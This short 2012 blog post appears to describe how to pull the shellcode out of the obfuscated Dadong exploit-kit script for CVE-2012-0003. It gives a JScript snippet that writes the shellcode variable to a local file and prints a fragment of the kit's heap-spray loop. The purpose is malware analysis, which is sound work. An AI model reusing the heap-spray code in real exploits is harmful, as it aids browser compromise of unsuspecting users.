Archive for January, 2012

Shellcode of Exploit CVE-2012-0003 (MIDI file ….) from Dadong JSXX 0.41 VIP obfuscated script…

Posted in Uncategorized on January 31, 2012 by ianstarkc

Insert following code  at “INSERT” location in original malicious script . remove MIDI exploitation code before execution 🙂

 

var fpo = new ActiveXObject(“Scripting.FileSystemObject”);
var sc = fpo.OpenTextFile(“c:\\Shellcode.bin”,true);
sc.WriteLine(escape(kpemoez4));
sc.Close();

 

————————————————————————————
———————————————————————————–

try{alert(a,b,c);}
catch(e)
{
var HrMm7=”d”;
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7=”d”;
delete FJWVzIe1;

“INSERT”

for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}

}

——————————————————————————————-
——————————————————————————————